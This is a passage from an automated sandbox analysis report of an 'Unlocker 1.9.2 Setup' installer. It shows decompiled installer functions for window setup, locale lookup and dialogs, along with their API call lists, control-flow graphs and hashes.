                                                                                                                                                              0x00403d20
                                                                                                                                                              0x00403d2c
                                                                                                                                                              0x00403d33
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403a84
                                                                                                                                                              0x00403a84
                                                                                                                                                              0x00403a87
                                                                                                                                                              0x00403aba
                                                                                                                                                              0x00403aba
                                                                                                                                                              0x00403abc
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403abc
                                                                                                                                                              0x00403a89
                                                                                                                                                              0x00403a8d
                                                                                                                                                              0x00403a92
                                                                                                                                                              0x00403a94
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403aa4
                                                                                                                                                              0x00403aac
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403ab2
                                                                                                                                                              0x004038e0
                                                                                                                                                              0x004038e0
                                                                                                                                                              0x004038e4
                                                                                                                                                              0x004038e9
                                                                                                                                                              0x004038f8
                                                                                                                                                              0x004038f8
                                                                                                                                                              0x00403901
                                                                                                                                                              0x0040390a
                                                                                                                                                              0x00403915
                                                                                                                                                              0x00403915
                                                                                                                                                              0x00403921
                                                                                                                                                              0x0040393d
                                                                                                                                                              0x00403940
                                                                                                                                                              0x00403953
                                                                                                                                                              0x00403959
                                                                                                                                                              0x004039fc
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403a05
                                                                                                                                                              0x0040395f
                                                                                                                                                              0x0040396c
                                                                                                                                                              0x0040396e
                                                                                                                                                              0x00403970
                                                                                                                                                              0x0040398f
                                                                                                                                                              0x0040398f
                                                                                                                                                              0x00403992
                                                                                                                                                              0x00403997
                                                                                                                                                              0x0040399a
                                                                                                                                                              0x004039aa
                                                                                                                                                              0x004039ab
                                                                                                                                                              0x004039ad
                                                                                                                                                              0x004039e3
                                                                                                                                                              0x004039f6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004039f6
                                                                                                                                                              0x004039af
                                                                                                                                                              0x004039b5
                                                                                                                                                              0x004039ce
                                                                                                                                                              0x004039d3
                                                                                                                                                              0x004039d5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004039d7
                                                                                                                                                              0x004039c3
                                                                                                                                                              0x004039c3
                                                                                                                                                              0x004039c5
                                                                                                                                                              0x004039c5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004039c5
                                                                                                                                                              0x004039b8
                                                                                                                                                              0x004039bd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004039bd
                                                                                                                                                              0x0040399c
                                                                                                                                                              0x004039a2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004039a4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004039a4
                                                                                                                                                              0x00403994
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403994
                                                                                                                                                              0x0040397a
                                                                                                                                                              0x00403981
                                                                                                                                                              0x00403987
                                                                                                                                                              0x00403989
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403989
                                                                                                                                                              0x00403945
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403923
                                                                                                                                                              0x00403929
                                                                                                                                                              0x00403933
                                                                                                                                                              0x00403d39
                                                                                                                                                              0x00403d39
                                                                                                                                                              0x00403d3f
                                                                                                                                                              0x00403d41
                                                                                                                                                              0x00403d47
                                                                                                                                                              0x00403d4c
                                                                                                                                                              0x00403d52
                                                                                                                                                              0x00403d52
                                                                                                                                                              0x00403d47
                                                                                                                                                              0x00403d5c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403d5c
                                                                                                                                                              0x00403921

                                                                                                                                                              APIs
                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004038F8
                                                                                                                                                              • ShowWindow.USER32(?), ref: 00403915
                                                                                                                                                              • DestroyWindow.USER32 ref: 00403929
                                                                                                                                                              • SetWindowLongA.USER32 ref: 00403945
                                                                                                                                                              • GetDlgItem.USER32 ref: 00403966
                                                                                                                                                              • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 0040397A
                                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403981
                                                                                                                                                              • GetDlgItem.USER32 ref: 00403A2F
                                                                                                                                                              • GetDlgItem.USER32 ref: 00403A39
                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403A53
                                                                                                                                                              • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403AA4
                                                                                                                                                              • GetDlgItem.USER32 ref: 00403B4A
                                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00403B6B
                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403B7D
                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403B98
                                                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403BAE
                                                                                                                                                              • EnableMenuItem.USER32 ref: 00403BB5
                                                                                                                                                              • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403BCD
                                                                                                                                                              • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403BE0
                                                                                                                                                              • lstrlenA.KERNEL32(00420478,?,00420478,Unlocker 1.9.2 Setup), ref: 00403C09
                                                                                                                                                              • SetWindowTextA.USER32(?,00420478), ref: 00403C18
                                                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00403D4C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Item$MessageSend$CallbackDispatcherShowUser$Menu$DestroyEnableEnabledLongSystemTextlstrlen
                                                                                                                                                              • String ID: Unlocker 1.9.2 Setup
                                                                                                                                                              • API String ID: 2523155381-3402739367
                                                                                                                                                              • Opcode ID: 17db576ff1e04bb401156bec3937a30c5754e03700d25ec8c7f88e75de32935b
                                                                                                                                                              • Instruction ID: 874aaf0cc80a4ada72e8b6aceb9d73cb056a569e4b675a7f159d56e4bf17f1bf
                                                                                                                                                              • Opcode Fuzzy Hash: 17db576ff1e04bb401156bec3937a30c5754e03700d25ec8c7f88e75de32935b
                                                                                                                                                              • Instruction Fuzzy Hash: F9C18E71A04204BBDB206F21ED85E2B3E7CEB05746F40453EF641B52F1C779AA429B2E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00403526 Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216stringregistrylibraryCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 381 403526-40353e call 405cff 384 403540-403550 call 40593b 381->384 385 403552-403579 call 4058c4 381->385 393 40359c-4035c5 call 4037ef call 4055b1 384->393 390 403591-403597 lstrcatA 385->390 391 40357b-40358c call 4058c4 385->391 390->393 391->390 399 4035cb-4035d0 393->399 400 40364c-403654 call 4055b1 393->400 399->400 401 4035d2-4035ea call 4058c4 399->401 406 403662-403687 LoadImageA 400->406 407 403656-40365d call 4059ff 400->407 405 4035ef-4035f6 401->405 405->400 408 4035f8-4035fa 405->408 410 403716-40371e call 40140b 406->410 411 40368d-4036c3 RegisterClassA 406->411 407->406 415 40360b-403617 lstrlenA 408->415 416 4035fc-403609 call 4054fb 408->416 423 403720-403723 410->423 424 403728-403733 call 4037ef 410->424 412 4037e5 411->412 413 4036c9-403711 SystemParametersInfoA CreateWindowExA 411->413 420 4037e7-4037ee 412->420 413->410 417 403619-403627 lstrcmpiA 415->417 418 40363f-403647 call 4054d0 call 4059dd 415->418 416->415 417->418 422 403629-403633 GetFileAttributesA 417->422 418->400 427 403635-403637 422->427 428 403639-40363a call 405517 422->428 423->420 434 403739-403756 ShowWindow LoadLibraryA 424->434 435 4037bc-4037bd call 404e4d 424->435 427->418 427->428 428->418 437 403758-40375d LoadLibraryA 434->437 438 40375f-403771 GetClassInfoA 434->438 439 4037c2-4037c4 435->439 437->438 440 403773-403783 GetClassInfoA RegisterClassA 438->440 441 403789-4037ac DialogBoxParamA call 40140b 438->441 442 4037c6-4037cc 439->442 443 4037de-4037e0 call 40140b 439->443 440->441 447 4037b1-4037ba call 403476 441->447 442->423 445 4037d2-4037d9 call 40140b 442->445 443->412 445->423 447->420
                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                              			E00403526() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t60;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				struct HINSTANCE__* _t76;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t86;

				_t81 =  *0x423e90; // 0x73eeb0
				_t20 = E00405CFF(6);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x420478;
					"1033" = 0x7830;
					E004058C4(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420478, 0);
					__eflags =  *0x420478;
					if(__eflags == 0) {
						E004058C4(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420478, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E0040593B("1033",  *_t20() & 0x0000ffff);
				}
				E004037EF(_t76, _t88);
				_t24 =  *0x423e98; // 0xa1
				_t85 = "C:\\Program Files\\Unlocker";
				 *0x423f00 = _t24 & 0x00000020;
				 *0x423f1c = 0x10000;
				if(E004055B1(_t88, "C:\\Program Files\\Unlocker") != 0) {
					L16:
					if(E004055B1(_t96, _t85) == 0) {
						E004059FF(0, _t79, _t81, _t85,  *((intOrPtr*)(_t81 + 0x118))); // executed
					}
					_t28 = LoadImageA( *0x423e80, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423668 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E004037EF(_t76, __eflags);
							__eflags =  *0x423f20; // 0x0
							if(__eflags != 0) {
								_t31 = E00404E4D(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42364c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420450, 5); // executed
							_t37 = LoadLibraryA("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t86 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t86, 0x423620);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423620);
								 *0x423644 = _t86;
								RegisterClassA(0x423620);
							}
							_t39 =  *0x423660; // 0x0
							_t42 = DialogBoxParamA( *0x423e80, _t39 + 0x00000069 & 0x0000ffff, 0, E004038BC, 0); // executed
							E00403476(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423e80; // 0x400000
						 *0x423634 = _t28;
						_v20 = 0x624e5f;
						 *0x423624 = E00401000;
						 *0x423630 = _t76;
						 *0x423644 =  &_v20;
						if(RegisterClassA(0x423620) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420450 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423e80, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t60 =  *0x423eb8; // 0x745dec
					_t79 = 0x422e20;
					E004058C4( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) + _t60, 0x422e20, 0);
					_t62 =  *0x422e20; // 0x52
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422e21;
						 *((char*)(E004054FB(0x422e21, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E004059DD(_t85, E004054D0(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E00405517(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}





























                                                                                                                                                              0x0040352c
                                                                                                                                                              0x00403535
                                                                                                                                                              0x0040353c
                                                                                                                                                              0x0040353e
                                                                                                                                                              0x00403552
                                                                                                                                                              0x00403564
                                                                                                                                                              0x0040356e
                                                                                                                                                              0x00403573
                                                                                                                                                              0x00403579
                                                                                                                                                              0x0040358c
                                                                                                                                                              0x0040358c
                                                                                                                                                              0x00403597
                                                                                                                                                              0x00403540
                                                                                                                                                              0x0040354b
                                                                                                                                                              0x0040354b
                                                                                                                                                              0x0040359c
                                                                                                                                                              0x004035a1
                                                                                                                                                              0x004035a6
                                                                                                                                                              0x004035af
                                                                                                                                                              0x004035b4
                                                                                                                                                              0x004035c5
                                                                                                                                                              0x0040364c
                                                                                                                                                              0x00403654
                                                                                                                                                              0x0040365d
                                                                                                                                                              0x0040365d
                                                                                                                                                              0x00403673
                                                                                                                                                              0x00403679
                                                                                                                                                              0x00403687
                                                                                                                                                              0x00403716
                                                                                                                                                              0x0040371e
                                                                                                                                                              0x00403728
                                                                                                                                                              0x0040372d
                                                                                                                                                              0x00403733
                                                                                                                                                              0x004037bd
                                                                                                                                                              0x004037c2
                                                                                                                                                              0x004037c4
                                                                                                                                                              0x004037e0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004037e0
                                                                                                                                                              0x004037c6
                                                                                                                                                              0x004037cc
                                                                                                                                                              0x004037d4
                                                                                                                                                              0x004037d4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004037cc
                                                                                                                                                              0x00403741
                                                                                                                                                              0x00403752
                                                                                                                                                              0x00403754
                                                                                                                                                              0x00403756
                                                                                                                                                              0x0040375d
                                                                                                                                                              0x0040375d
                                                                                                                                                              0x00403765
                                                                                                                                                              0x0040376d
                                                                                                                                                              0x0040376f
                                                                                                                                                              0x00403771
                                                                                                                                                              0x0040377a
                                                                                                                                                              0x0040377d
                                                                                                                                                              0x00403783
                                                                                                                                                              0x00403783
                                                                                                                                                              0x00403789
                                                                                                                                                              0x004037a2
                                                                                                                                                              0x004037b3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004037b8
                                                                                                                                                              0x00403720
                                                                                                                                                              0x00403722
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040368d
                                                                                                                                                              0x0040368d
                                                                                                                                                              0x00403693
                                                                                                                                                              0x0040369d
                                                                                                                                                              0x004036a5
                                                                                                                                                              0x004036af
                                                                                                                                                              0x004036b5
                                                                                                                                                              0x004036c3
                                                                                                                                                              0x004037e5
                                                                                                                                                              0x004037e5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004037e5
                                                                                                                                                              0x004036c9
                                                                                                                                                              0x004036d2
                                                                                                                                                              0x00403711
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403711
                                                                                                                                                              0x004035cb
                                                                                                                                                              0x004035cb
                                                                                                                                                              0x004035d0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004035d5
                                                                                                                                                              0x004035da
                                                                                                                                                              0x004035ea
                                                                                                                                                              0x004035ef
                                                                                                                                                              0x004035f6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004035fa
                                                                                                                                                              0x004035fc
                                                                                                                                                              0x00403609
                                                                                                                                                              0x00403609
                                                                                                                                                              0x00403611
                                                                                                                                                              0x00403617
                                                                                                                                                              0x0040363f
                                                                                                                                                              0x00403647
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403629
                                                                                                                                                              0x0040362a
                                                                                                                                                              0x00403633
                                                                                                                                                              0x00403639
                                                                                                                                                              0x0040363a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040363a
                                                                                                                                                              0x00403635
                                                                                                                                                              0x00403637
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403637
                                                                                                                                                              0x00403617

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00405CFF: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                                                                                                                                                • Part of subcall function 00405CFF: LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                                                                                                                                                • Part of subcall function 00405CFF: GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                                                                                                                                              • lstrcatA.KERNEL32(1033,00420478,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420478,00000000,00000006,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403597
                                                                                                                                                              • lstrlenA.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Program Files\Unlocker,1033,00420478,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420478,00000000,00000006,"C:\Users\user\Desktop\Unlocker1.9.2.exe"), ref: 0040360C
                                                                                                                                                              • lstrcmpiA.KERNEL32(?,.exe,Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Program Files\Unlocker,1033,00420478,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420478,00000000), ref: 0040361F
                                                                                                                                                              • GetFileAttributesA.KERNEL32(Remove folder: ), ref: 0040362A
                                                                                                                                                              • LoadImageA.USER32 ref: 00403673
                                                                                                                                                                • Part of subcall function 0040593B: wsprintfA.USER32 ref: 00405948
                                                                                                                                                              • RegisterClassA.USER32 ref: 004036BA
                                                                                                                                                              • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036D2
                                                                                                                                                              • CreateWindowExA.USER32 ref: 0040370B
                                                                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403741
                                                                                                                                                              • LoadLibraryA.KERNELBASE(RichEd20), ref: 00403752
                                                                                                                                                              • LoadLibraryA.KERNEL32(RichEd32), ref: 0040375D
                                                                                                                                                              • GetClassInfoA.USER32 ref: 0040376D
                                                                                                                                                              • GetClassInfoA.USER32 ref: 0040377A
                                                                                                                                                              • RegisterClassA.USER32 ref: 00403783
                                                                                                                                                              • DialogBoxParamA.USER32 ref: 004037A2
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                              • String ID: "C:\Users\user\Desktop\Unlocker1.9.2.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Program Files\Unlocker$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$]t
                                                                                                                                                              • API String ID: 914957316-3020842814
                                                                                                                                                              • Opcode ID: f93f1545b230c8163d09655257c65a13db3ac628cd3f161671649cd9b752f71f
                                                                                                                                                              • Instruction ID: 0f3f48bff709b167bb3a38cee6451da723a784a17f6d38f49bc0c0f1e25ee8dd
                                                                                                                                                              • Opcode Fuzzy Hash: f93f1545b230c8163d09655257c65a13db3ac628cd3f161671649cd9b752f71f
                                                                                                                                                              • Instruction Fuzzy Hash: 9261C5B1A04200BAD6206F659C45E3B3A6DE74474AF40453FF941B62E1D67D9E028B3E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00403ED7 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 204windowstringCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 452 403ed7-403ee7 453 403ffa-40400d 452->453 454 403eed-403ef5 452->454 457 404069-40406d 453->457 458 40400f-404018 453->458 455 403ef7-403f06 454->455 456 403f08-403fa0 call 403d8f * 2 CheckDlgButton call 403db1 GetDlgItem call 403dc4 SendMessageA 454->456 455->456 490 403fa2-403fa5 GetSysColor 456->490 491 403fab-403ff5 SendMessageA * 2 lstrlenA SendMessageA * 2 456->491 462 404073-404087 GetDlgItem 457->462 463 40413d-404144 457->463 459 40414c 458->459 460 40401e-404026 458->460 466 40414f-404156 call 403df6 459->466 460->459 464 40402c-404038 460->464 468 404089-404090 462->468 469 4040fb-404102 462->469 463->459 465 404146 463->465 464->459 470 40403e-404064 GetDlgItem SendMessageA call 403db1 call 404162 464->470 465->459 476 40415b-40415f 466->476 468->469 473 404092-4040ad 468->473 469->466 474 404104-40410b 469->474 470->457 473->469 478 4040af-4040f8 SendMessageA LoadCursorA SetCursor ShellExecuteA LoadCursorA SetCursor 473->478 474->466 479 40410d-404111 474->479 478->469 482 404113-404122 SendMessageA 479->482 483 404124-404128 479->483 482->483 484 404138-40413b 483->484 485 40412a-404136 SendMessageA 483->485 484->476 485->484 490->491 491->476
                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                              			E00403ED7(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420458 =  *0x420458 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403DF6(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422e20;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423e88, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423e88, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420458 != 0) {
						goto L25;
					} else {
						_t103 =  *0x41fc48; // 0x73f11c
						_t25 = _t103 + 0x14; // 0x73f130
						_t112 = _t25;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403DB1(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404162();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42365c; // 0x7664ab
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x423eb8; // 0x745dec
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403EA3;
				E00403D8F(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403D8F(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403DB1( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403DC4(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x423e90; // 0x73eeb0
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f43c =  *0x41f43c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16); // executed
				 *0x420458 =  *0x420458 & 0x00000000;
				return 0;
			}





















                                                                                                                                                              0x00403ee7
                                                                                                                                                              0x0040400d
                                                                                                                                                              0x00404069
                                                                                                                                                              0x0040406d
                                                                                                                                                              0x00404144
                                                                                                                                                              0x00404146
                                                                                                                                                              0x00404146
                                                                                                                                                              0x0040414c
                                                                                                                                                              0x0040414c
                                                                                                                                                              0x0040414f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404156
                                                                                                                                                              0x0040407b
                                                                                                                                                              0x0040407d
                                                                                                                                                              0x00404087
                                                                                                                                                              0x00404092
                                                                                                                                                              0x00404095
                                                                                                                                                              0x00404098
                                                                                                                                                              0x004040a3
                                                                                                                                                              0x004040a6
                                                                                                                                                              0x004040ad
                                                                                                                                                              0x004040bb
                                                                                                                                                              0x004040d3
                                                                                                                                                              0x004040e6
                                                                                                                                                              0x004040f6
                                                                                                                                                              0x004040f8
                                                                                                                                                              0x004040f8
                                                                                                                                                              0x004040ad
                                                                                                                                                              0x00404102
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040410d
                                                                                                                                                              0x00404111
                                                                                                                                                              0x00404122
                                                                                                                                                              0x00404122
                                                                                                                                                              0x00404128
                                                                                                                                                              0x00404136
                                                                                                                                                              0x00404136
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040413a
                                                                                                                                                              0x00404102
                                                                                                                                                              0x00404018
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040402c
                                                                                                                                                              0x0040402c
                                                                                                                                                              0x00404032
                                                                                                                                                              0x00404032
                                                                                                                                                              0x00404038
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040405d
                                                                                                                                                              0x0040405f
                                                                                                                                                              0x00404064
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404064
                                                                                                                                                              0x00404018
                                                                                                                                                              0x00403eed
                                                                                                                                                              0x00403ef0
